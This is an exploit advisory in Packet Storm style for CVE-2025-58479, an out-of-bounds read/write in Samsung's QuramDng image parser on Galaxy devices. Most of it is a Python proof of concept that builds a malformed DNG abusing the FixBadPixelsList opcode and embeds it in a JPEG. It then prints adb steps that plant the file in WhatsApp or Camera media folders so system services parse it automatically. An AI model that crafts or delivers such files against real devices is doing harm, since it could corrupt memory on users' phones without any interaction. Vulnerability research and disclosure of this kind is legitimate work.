Samsung QuramDng Embedded DNG Out-Of-Bounds Read / Write
=============================================================================================================================================
| # Title Samsung QuramDng Embedded DNG Out-Of-Bounds Read / Write
=============================================================================================================================================
| # Title : Samsung QuramDng via Malicious DNG Embedded in JPEG Out-of-Bounds Read/Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213367/ & CVE-2025-58479
[+] Summary : This proof-of-concept demonstrates an out-of-bounds read/write vulnerability in Samsung?s QuramDng image parser, affecting Galaxy S22?S25 devices running One UI 6+.
By crafting a malformed DNG that abuses the OpcodeList1 (specifically the FixBadPixelsList opcode) and embedding it inside a JPEG container, the parser processes invalid pixel coordinates without proper bounds checking.
When handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
import os
def create_malicious_dng():
dng_data = bytearray()
dng_data.extend(b'II\x2A\x00')
dng_data.extend(struct.pack('<I', 8))
ifd0_offset = len(dng_data)
dng_data.extend(struct.pack('<H', 5))
dng_data.extend(struct.pack('<H', 256))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 1024))
dng_data.extend(struct.pack('<H', 257))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 32))
dng_data.extend(struct.pack('<H', 322))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 1024))
dng_data.extend(struct.pack('<H', 323))
dng_data.extend(struct.pack('<H', 4))
dng_data.extend(struct.pack('<I', 1))
dng_data.extend(struct.pack('<I', 32))
dng_data.extend(struct.pack('<H', 51008))
dng_data.extend(struct.pack('<H', 1))
dng_data.extend(struct.pack('<I', 100))
opcode_offset = len(dng_data) + 4
dng_data.extend(struct.pack('<I', opcode_offset))
dng_data.extend(struct.pack('<I', 0))
dng_data.extend(struct.pack('<I', opcode_offset))
opcode_data = bytearray()
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 36))
opcode_data.extend(struct.pack('<I', 0x00030001))
opcode_data.extend(struct.pack('<I', 0x41414141))
opcode_data.extend(struct.pack('<B', 0))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 32))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 0))
opcode_data.extend(struct.pack('<H', 1))
opcode_data.extend(struct.pack('<H', 1))
while len(opcode_data) < 36:
opcode_data.extend(b'\x00')
dng_data.extend(opcode_data)
image_data_offset = len(dng_data)
dng_data.extend(b'\x00' * 1024 * 32 * 2) # Minimal raw image data
return bytes(dng_data)
def create_poc_jpeg_wrapper():
jpeg_data = bytearray()
jpeg_data.extend(b'\xFF\xD8\xFF\xE0')
jpeg_data.extend(b'\x00\x10')
jpeg_data.extend(b'JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00')
jpeg_data.extend(b'\xFF\xFE')
comment = b"Malicious DNG for CVE-2025-58479"
jpeg_data.extend(struct.pack('>H', len(comment) + 2))
jpeg_data.extend(comment)
dng_data = create_malicious_dng()
jpeg_data.extend(b'\xFF\xED')
jpeg_data.extend(struct.pack('>H', len(dng_data) + 2))
jpeg_data.extend(dng_data)
jpeg_data.extend(b'\xFF\xDB')
jpeg_data.extend(b'\x00\x43\x00\x03\x02\x02\x02\x02\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04\x04\x04\x04\x08\x06\x06\x05\x06\x09\x08\x0A\x0A\x09\x08\x09\x09\x0A\x0C\x0F\x0C\x0A\x0B\x0E\x0B\x09\x09\x0D\x11\x0D\x0E\x0F\x10\x10\x11\x10\x0A\x0C\x12\x13\x12\x10\x13\x0F\x10\x10\x10\x01')
jpeg_data.extend(b'\xFF\xC0')
jpeg_data.extend(b'\x00\x0B\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01')
jpeg_data.extend(b'\xFF\xC4')
jpeg_data.extend(b'\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B')
jpeg_data.extend(b'\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00')
jpeg_data.extend(b'\x00')
jpeg_data.extend(b'\xFF\xD9')
return bytes(jpeg_data)
def main():
print("[*] Creating PoC for CVE-2025-58479 - Samsung QuramDng OOB Vulnerability")
print("[*] Affected: Samsung Galaxy S22-S25 with One UI 6+")
poc_data = create_poc_jpeg_wrapper()
filename = "poc_cve_2025_58479.jpeg"
with open(filename, "wb") as f:
f.write(poc_data)
print(f"[+] Created malicious file: {filename}")
print(f"[+] File size: {len(poc_data)} bytes")
print("\n[*] To test on device:")
print(f" adb push {filename} /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/")
print(f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp%20Images/{filename}")
print("\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file")
print("[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV")
print("\n[*] Alternative test with Gallery:")
print(f" adb push {filename} /storage/emulated/0/DCIM/Camera/")
print(f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/Camera/{filename}")
print("\n[*] Open Samsung Gallery to trigger decode")
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================